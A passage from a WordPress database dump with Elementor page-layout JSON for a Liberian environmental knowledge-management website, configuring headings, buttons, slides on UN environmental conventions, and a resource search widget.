Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\"}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\"}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c527f4\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6472317\"}]},\"elements\":[{\"id\":\"39c4f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(26997,3930,'_elementor_version','3.4.0'),(26998,3930,'_elementor_template_type','wp-page'),(26999,3930,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(27001,3930,'_elementor_pro_version','3.3.6'),(27003,3931,'_wp_page_template','default'),(27004,3931,'_elementor_edit_mode','builder'),(27005,3931,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/featured_cbd.jpg\",\"id\":209,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/featured_marine.jpg\",\"id\":210,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/slide_ccd.jpg\",\"id\":211,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}]},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\"}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\"}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c527f4\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6472317\"}]},\"elements\":[{\"id\":\"39c4f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(27006,3931,'_elementor_version','3.4.0'),(27007,3931,'_elementor_template_type','wp-page'),(27008,3931,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(27010,3931,'_elementor_pro_version','3.3.6'),(27012,3932,'_wp_page_template','default'),(27013,3932,'_elementor_edit_mode','builder'),(27014,3932,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read 